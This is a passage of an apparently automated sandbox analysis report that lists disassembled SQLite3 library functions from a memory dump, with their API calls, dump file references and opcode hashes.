                                    • Part of subcall function 61E17C24: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E21F32), ref: 61E17C8F
                                    • Part of subcall function 61E17C24: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E712), ref: 61E17F58
                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E88AB2
                                  • sqlite3_realloc64.SQLITE3 ref: 61E88AE7
                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E88B0F
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_configsqlite3_initializesqlite3_realloc64
                                  • String ID:
                                  • API String ID: 1177761455-0
                                  • Opcode ID: 9bb8296d892ec2c835220d265d127cdf5500c09bf81358b48e063d922418a37a
                                  • Instruction ID: 187daa50e327ddd61bf0101189ec9ac92a86fbbae042de5ca21331b279bac4c3
                                  • Opcode Fuzzy Hash: 9bb8296d892ec2c835220d265d127cdf5500c09bf81358b48e063d922418a37a
                                  • Instruction Fuzzy Hash: 4201BCB4608B458BDB50AFAAC440B1ABBE4FBCA748F24893DDA49CB300E331D851DB51
                                  Function 61E89B20 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: __dllonexit_lock_onexit_unlock
                                  • String ID:
                                  • API String ID: 209411981-0
                                  • Opcode ID: f09f41fe1e4e55606ce1d4bf7b44d21027c0660ee3b9a3d4f6468084668fea88
                                  • Instruction ID: e3ade6bb6eea864b4b77d567e8b701b381f9569053faf472a3def64776bcd4d5
                                  • Opcode Fuzzy Hash: f09f41fe1e4e55606ce1d4bf7b44d21027c0660ee3b9a3d4f6468084668fea88
                                  • Instruction Fuzzy Hash: E511A2B4919B428FDB80EF79C08451EBBE0BB89319F158C2EE4D987340E735D484CB42
                                  Function 61E0C68E Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_free.SQLITE3 ref: 61E0C6C6
                                    • Part of subcall function 61E0A220: sqlite3_free.SQLITE3 ref: 61E0A241
                                  • sqlite3_free.SQLITE3 ref: 61E0C6D9
                                  • sqlite3_free.SQLITE3 ref: 61E0C6BB
                                    • Part of subcall function 61E09B73: sqlite3_mutex_enter.SQLITE3 ref: 61E09B92
                                  • sqlite3_free.SQLITE3 ref: 61E0C707
                                    • Part of subcall function 61E0A3B7: sqlite3_free.SQLITE3 ref: 61E0A3C8
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_free$sqlite3_mutex_enter
                                  • String ID:
                                  • API String ID: 3930042888-0
                                  • Opcode ID: cb24f4efa77f9ac15201abfdc1d25fe0f8f1219cf0e62de4bb804b80c66bc85a
                                  • Instruction ID: e11eee35d0ceec0c991c20cc3d7d1d28312db59945cee306ab64111bc1ac9e7f
                                  • Opcode Fuzzy Hash: cb24f4efa77f9ac15201abfdc1d25fe0f8f1219cf0e62de4bb804b80c66bc85a
                                  • Instruction Fuzzy Hash: F2017171A046898BD710AF78E88095EF7F4EF8431AF61886DD8898B310D774E861CF94
                                  Function 61E38C3B Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_vmprintf.SQLITE3 ref: 61E38C5C
                                    • Part of subcall function 61E34E96: sqlite3_initialize.SQLITE3 ref: 61E34E9C
                                  • sqlite3_mprintf.SQLITE3 ref: 61E38C86
                                  • sqlite3_free.SQLITE3 ref: 61E38C91
                                  • sqlite3_free.SQLITE3 ref: 61E38CA4
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_free$sqlite3_initializesqlite3_mprintfsqlite3_vmprintf
                                  • String ID:
                                  • API String ID: 690915108-0
                                  • Opcode ID: 239ddb261c3e6589749f819f52e5cb8dc00d206beb7d6357d2eb78034abeb09f
                                  • Instruction ID: 91a5a4a0d52eb3a81b8d57105def17065b4cbaf78dca1190cf22a01548602c8b
                                  • Opcode Fuzzy Hash: 239ddb261c3e6589749f819f52e5cb8dc00d206beb7d6357d2eb78034abeb09f
                                  • Instruction Fuzzy Hash: D6011E70A093169FD7409FB9D480A5ABBE4FF88364F61892DE988C7340E334D450DB52
                                  Function 61E1F08F Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_aggregate_context.SQLITE3 ref: 61E1F0A4
                                  • sqlite3_result_error.SQLITE3 ref: 61E1F0D4
                                  • sqlite3_result_double.SQLITE3 ref: 61E1F0EA
                                  • sqlite3_result_int64.SQLITE3 ref: 61E1F102
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_aggregate_contextsqlite3_result_doublesqlite3_result_errorsqlite3_result_int64
                                  • String ID:
                                  • API String ID: 3779139978-0
                                  • Opcode ID: d3cb904285bf7ce3a213363a3d692f274290cbe781b737b4288ca0506b2b9979
                                  • Instruction ID: c7b1b5c872699fac0233575c28cbdf7a710cdef6f12b57775d04f8610e5ba2d5
                                  • Opcode Fuzzy Hash: d3cb904285bf7ce3a213363a3d692f274290cbe781b737b4288ca0506b2b9979
                                  • Instruction Fuzzy Hash: 1A0121B450C7419FD7009F54C58671ABFE0AB45318F25C59DE4D90B3A6C778C488CB82
                                  Function 61E17F67 Relevance: 6.0, APIs: 4, Instructions: 38stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_initialize.SQLITE3 ref: 61E17F75
                                    • Part of subcall function 61E17C24: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E712), ref: 61E17C5B
                                    • Part of subcall function 61E17C24: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E21F32), ref: 61E17C8F
                                    • Part of subcall function 61E17C24: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E712), ref: 61E17F58
                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E17F8D
                                  • strcmp.MSVCRT ref: 61E17FAA
                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E17FBB
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_configsqlite3_initializestrcmp
                                  • String ID:
                                  • API String ID: 2933023327-0
                                  • Opcode ID: 106758cad55237184e8648a95b0c3fd67c5914402b3b1377488dd18f7f672032
                                  • Instruction ID: 6bb4c20809af056ce1147ca89e03c2938013f81e4c45bf3795f6f6211ed55a12
                                  • Opcode Fuzzy Hash: 106758cad55237184e8648a95b0c3fd67c5914402b3b1377488dd18f7f672032
                                  • Instruction Fuzzy Hash: 23F09671A093515BDB006FE5C4C151BBBA8ABC9A59F55843CE9448B345D730D89187E1
                                  Function 61E37B5F Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_vmprintf.SQLITE3 ref: 61E37B78
                                    • Part of subcall function 61E34E96: sqlite3_initialize.SQLITE3 ref: 61E34E9C
                                  • sqlite3_mprintf.SQLITE3 ref: 61E37B96
                                    • Part of subcall function 61E35932: sqlite3_initialize.SQLITE3 ref: 61E35938
                                    • Part of subcall function 61E35932: sqlite3_vmprintf.SQLITE3 ref: 61E35952
                                  • sqlite3_free.SQLITE3 ref: 61E37BA2
                                    • Part of subcall function 61E09B73: sqlite3_mutex_enter.SQLITE3 ref: 61E09B92
                                  • sqlite3_free.SQLITE3 ref: 61E37BAA
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_freesqlite3_initializesqlite3_vmprintf$sqlite3_mprintfsqlite3_mutex_enter
                                  • String ID:
                                  • API String ID: 2126213637-0
                                  • Opcode ID: 362a7a5131d46ebd1b0033c55cd15092979ad2ebbb7f11161d9b8524aee24ced
                                  • Instruction ID: 25eb49d64be489812a0feae17e364d7d1cfdcab0b927614458e10bd34b2f04a8
                                  • Opcode Fuzzy Hash: 362a7a5131d46ebd1b0033c55cd15092979ad2ebbb7f11161d9b8524aee24ced
                                  • Instruction Fuzzy Hash: 53F05E71A097659BD740BFAD948045EBFE8EEC4664F65882EE989C7300E730C800CBA6
                                  Function 61E38A59 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_value_pointer.SQLITE3 ref: 61E38A70
                                    • Part of subcall function 61E0E47C: strcmp.MSVCRT ref: 61E0E4AA
                                  • sqlite3_mprintf.SQLITE3 ref: 61E38A89
                                    • Part of subcall function 61E35932: sqlite3_initialize.SQLITE3 ref: 61E35938
                                    • Part of subcall function 61E35932: sqlite3_vmprintf.SQLITE3 ref: 61E35952
                                  • sqlite3_result_error.SQLITE3 ref: 61E38A9F
                                  • sqlite3_free.SQLITE3 ref: 61E38AA7
                                    • Part of subcall function 61E09B73: sqlite3_mutex_enter.SQLITE3 ref: 61E09B92
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_freesqlite3_initializesqlite3_mprintfsqlite3_mutex_entersqlite3_result_errorsqlite3_value_pointersqlite3_vmprintfstrcmp
                                  • String ID:
                                  • API String ID: 2416658597-0
                                  • Opcode ID: b352af5d1d43001a4e6118784846a0df159998c746de05695d26f4c62e880ffc
                                  • Instruction ID: b3492d9bddd622dd00bf2f8d46bb435889c42229029205639411c97f5ae70e10
                                  • Opcode Fuzzy Hash: b352af5d1d43001a4e6118784846a0df159998c746de05695d26f4c62e880ffc
                                  • Instruction Fuzzy Hash: D2F05EB050C7119BC7416F6D848161ABBE4EF893A4F60CA6CE0DCCB381D370C4919B82
                                  Function 61E88B1E Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_initialize.SQLITE3 ref: 61E88B25
                                    • Part of subcall function 61E17C24: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E712), ref: 61E17C5B
                                    • Part of subcall function 61E17C24: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E21F32), ref: 61E17C8F
                                    • Part of subcall function 61E17C24: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E712), ref: 61E17F58
                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E88B3D
                                  • sqlite3_free.SQLITE3 ref: 61E88B4A
                                    • Part of subcall function 61E09B73: sqlite3_mutex_enter.SQLITE3 ref: 61E09B92
                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E88B66
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_mutex_enter$sqlite3_mutex_leave$sqlite3_configsqlite3_freesqlite3_initialize
                                  • String ID:
                                  • API String ID: 3512769177-0
                                  • Opcode ID: 1e277e1cc8a1425b3196755d028112d479df71f9d818c304692c2b02406d21a7
                                  • Instruction ID: c3dc9a078684b698013cacd526e8ce89ce4a7b2c2564aea4ef454f56fa541adf
                                  • Opcode Fuzzy Hash: 1e277e1cc8a1425b3196755d028112d479df71f9d818c304692c2b02406d21a7
                                  • Instruction Fuzzy Hash: 5FE0DFB0418F468BCB00BFF9C084309B6F8BB8270DF51492CC64A8B301E770C0608B52
                                  Function 61E7618E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 149COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E761D7
                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E766C7
                                    • Part of subcall function 61E5EE52: sqlite3_strnicmp.SQLITE3 ref: 61E5EEDE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leavesqlite3_strnicmp
                                  • String ID: lWa
                                  • API String ID: 100587609-1862734881
                                  • Opcode ID: 821503550eb637cb68f92cc47a6bb66112c18ebb95fefdce289759c34dfb9633
                                  • Instruction ID: 143df54d75fa4420bdb9b5192d89d11a1bb9bf96a97a3d942496f7e74b1e94c7
                                  • Opcode Fuzzy Hash: 821503550eb637cb68f92cc47a6bb66112c18ebb95fefdce289759c34dfb9633
                                  • Instruction Fuzzy Hash: CB61F874A4435A9BEB20DF69C984799BBB0AB89308F20C4AAD81997351D734DE85CF80
                                  Function 61E17A2D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_log
                                  • String ID: ua
                                  • API String ID: 632333372-1430901121
                                  • Opcode ID: fa11c2048534c2c56745c4e60b264e5b550c5e2f9cf6ee9a73b31a95fc0108ce
                                  • Instruction ID: 44237b86c6ad651e1272de2b2679b300dd06ce40763b927a0cfaca64242f503e
                                  • Opcode Fuzzy Hash: fa11c2048534c2c56745c4e60b264e5b550c5e2f9cf6ee9a73b31a95fc0108ce
                                  • Instruction Fuzzy Hash: 325103B4A19A05EFDB40CF5EC48264D77A1F70FB54F24C82AED198B348E330DA818B52
                                  Function 61E06FD5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 101COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_strnicmp
                                  • String ID: '$null
                                  • API String ID: 1961171630-2611297978
                                  • Opcode ID: a1b2d44fd352f59d863dbbcbec7358514ac8da4ec226eab95ec4f5abcb2ee662
                                  • Instruction ID: f1ebc9ab8d71ef792f8759f348f0cfaba99aa5cdd83797c5509fe2389a8b138b
                                  • Opcode Fuzzy Hash: a1b2d44fd352f59d863dbbcbec7358514ac8da4ec226eab95ec4f5abcb2ee662
                                  • Instruction Fuzzy Hash: 0131DC28F486864EF700C9B4C4A5393FBD35B8635BF78C365C1C54A38AE525D8A54342
                                  Function 61E26EBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_win32_is_nt.SQLITE3 ref: 61E26EF8
                                    • Part of subcall function 61E1759B: InterlockedCompareExchange.KERNEL32 ref: 61E175BB
                                    • Part of subcall function 61E1759B: InterlockedCompareExchange.KERNEL32 ref: 61E17602
                                    • Part of subcall function 61E1759B: InterlockedCompareExchange.KERNEL32 ref: 61E17622
                                    • Part of subcall function 61E17525: sqlite3_win32_sleep.SQLITE3 ref: 61E1757D
                                  • sqlite3_free.SQLITE3 ref: 61E26FC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
